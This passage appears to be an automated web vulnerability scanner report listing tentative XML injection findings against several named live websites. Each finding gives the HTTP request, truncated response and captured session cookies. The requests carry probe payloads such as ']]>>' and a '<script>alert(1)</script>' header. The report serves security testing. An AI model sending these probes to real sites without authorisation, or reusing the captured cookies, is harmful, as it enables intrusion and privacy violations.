Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 404 Not Found
X-Cnection: close
Content-Type: text/html
Content-Length: 345
Date: Mon, 02 May 2011 02:04:13 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
11.2. http://loadus.exelator.com/load/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/?p=218&g=002&c=153225 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; EVX=eJxLtDK0qs60srS0NLVOhLANrIutDC2slAxNzQ3izeONDEziDUwN443iDZWsa2sBRqkNBg%253D%253D; BFF=eJxLtDK3qi62MjS1Ugo2MjDx9HOuMTB0sLS0NFWyzgQKmxtYA2WNrZR8%252Ff1CPHwi48M8gz1DlKwTrQwNiNBogCyLLGEEl0DXYw6XQTMoxNDAxBek2ggqYQiUMIWKIwmhqDXGIuGHwxA%252FXGoRhtTidTpWV5rgcpIJPifhsh8AGMBniA%253D%253D; TFF=eJyNkD0OwyAMRu%252BSE9gGioCFY2RlYKjUrdki7l6jhghhWjHw%252F57hI3kkf75rvxHoCAajc462kDwfPD0GbsYCD9CmRfCm8mrgKXyXvWdvbc3gPdDrtfOeX%252BnIY219GXqSAutzHjBN3fE44UWGdg8Nnr21NYNHkbqR6sebCOcZ8D8vMqD83T4Da2tG%252BQCHK5kT

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Mon, 02 May 2011 01:56:44 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
11.3. http://loadus.exelator.com/load/net.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load]]>>/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Mon, 02 May 2011 01:56:18 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
11.4. http://loadus.exelator.com/load/net.php [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /load/net.php]]>>?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Mon, 02 May 2011 01:56:20 GMT
Server: HTTP server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
11.5. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794 [F cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://news.yahoo.com
Path:   /s/prweb/20110427/bs_prweb/prweb5276794

Issue detail

The F cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the F cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /s/prweb/20110427/bs_prweb/prweb5276794 HTTP/1.1
Host: news.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=8khj7j56qmjsh&b=3&s=7r; F=a=I9dRHdwMvTUKaBDhiVaH.UVtn.V7Y30KdDQIYBG7obdok_NZIfFNBlUZT4rlwq78V5tRt3I-&b=WFvT]]>>; YLS=v=1&p=1&n=9

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:03 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: MwPhCom_degraded_status=false; path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: close
Server: YTS/1.19.4

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">

<!--
...[SNIP]...
</a>Higher costs hit soap makers and will hit shoppers.</div>
...[SNIP]...
11.6. http://translate.googleapis.com/translate_a/l [cb parameter]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://translate.googleapis.com
Path:   /translate_a/l

Issue detail

The cb parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the cb parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /translate_a/l?client=te&hl=en&cb=_callbacks_._0gn72esm1]]>> HTTP/1.1
Host: translate.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/showthread.php?126285-Rear-boarding-step
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:11 GMT
Expires: Mon, 02 May 2011 02:30:11 GMT
Cache-Control: private, max-age=86400
Content-Type: text/xml; charset=UTF-8
Content-Language: en
Set-Cookie: PREF=ID=644bd9b9a05b0c42:TM=1304303411:LM=1304303411:S=VM-yzGjHZNmmB5-J; expires=Wed, 01-May-2013 02:30:11 GMT; path=/; domain=translate.googleapis.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 11962

<?xml version="1.0" encoding="UTF-8" ?><LanguagePairs><Pair source_id="auto" source_name="Detect language" target_id="en" target_name="English" text="" /><Pair source_id="af" source_name="Afrikaans" t
...[SNIP]...
11.7. http://www.binsearch.info/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.binsearch.info
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.binsearch.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 01 May 2011 23:57:32 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
11.8. http://www.hairyforever.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.hairyforever.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hairyforever.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.11
Date: Mon, 02 May 2011 00:15:41 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Keep-Alive: timeout=45
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Language: en
Expires: Mon, 02 May 2011 00:15:41 GMT
Content-Length: 1011

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
11.9. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.highcharts.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /highslide]]>>/graphics/zoomout.cur HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.highcharts.com

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 02:49:14 GMT
Server: Apache/2.2.16
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
11.10. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.highcharts.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /highslide/graphics]]>>/zoomout.cur HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.highcharts.com

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 02:49:23 GMT
Server: Apache/2.2.16
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
11.11. http://www.highcharts.com/highslide/graphics/zoomout.cur [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.highcharts.com
Path:   /highslide/graphics/zoomout.cur

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /highslide/graphics/zoomout.cur]]>> HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.highcharts.com

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 02:49:32 GMT
Server: Apache/2.2.16
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Language: en

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
11.12. http://www.mangastream.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.mangastream.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mangastream.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Mon, 02 May 2011 00:34:17 GMT
Server: lighttpd/1.4.28

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
11.13. http://www.masalaboard.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.masalaboard.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.masalaboard.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 01 May 2011 23:17:57 GMT
Server: lighttpd/1.4.22

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
11.14. http://www.myp2p.eu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.myp2p.eu
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myp2p.eu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.67
Date: Mon, 02 May 2011 00:24:02 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 345

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
11.15. http://www.oxfamamerica.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.oxfamamerica.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /favicon.ico]]>> HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oxfamamerica.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Mon, 02 May 2011 00:54:46 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
Bobo-Exception-Line: 672
Bobo-Exception-Value: See the server error log for details
Content-Language: en-us
Bobo-Exception-File: HTTPResponse.py
Bobo-Exception-Type: NotFound
Expires: Sat, 1 Jan 2000 00:00:00 GMT
X-Ksscommands: <?xml version="1.0"?> <kukit xmlns="http://www.kukit.org/commands/1.1"> <commands>    <command name="error">        <param name="type">system</param>        <param name="message">NotFound: &amp;lt;h2&amp;gt;Site Error&amp;lt;/h2&amp;gt; &amp;lt;p&amp;gt;An error was encountered while publishing this resource. &amp;lt;/p&amp;gt; &amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;Resource not found&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt; Sorry, the requested resource does not exist.&amp;lt;p&amp;gt;Check the URL and try again.&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;&amp;lt;b&amp;gt;Resource:&amp;lt;/b&amp;gt; http://www.oxfamamerica.org/favicon.ico%5D%5D%3E%3E&amp;lt;/p&amp;gt; &amp;lt;hr noshade="noshade"/&amp;gt; &amp;lt;p&amp;gt;Troubleshooting Suggestions&amp;lt;/p&amp;gt; &amp;lt;ul&amp;gt; &amp;lt;li&amp;gt;The URL may be incorrect.&amp;lt;/li&amp;gt; &amp;lt;li&amp;gt;The parameters passed to this resource may be incorrect.&amp;lt;/li&amp;gt; &amp;lt;li&amp;gt;A resource that this resource relies on may be encountering an error.&amp;lt;/li&amp;gt; &amp;lt;/ul&amp;gt; &amp;lt;p&amp;gt;For more detailed information about the error, please refer to the error log. &amp;lt;/p&amp;gt; &amp;lt;p&amp;gt;If the error persists please contact the site maintainer. Thank you for your patience. &amp;lt;/p&amp;gt;</param>    </command> </commands> </kukit>
Content-Length: 25488
X-Varnish: 2109310493
Age: 0
Via: 1.1 varnish

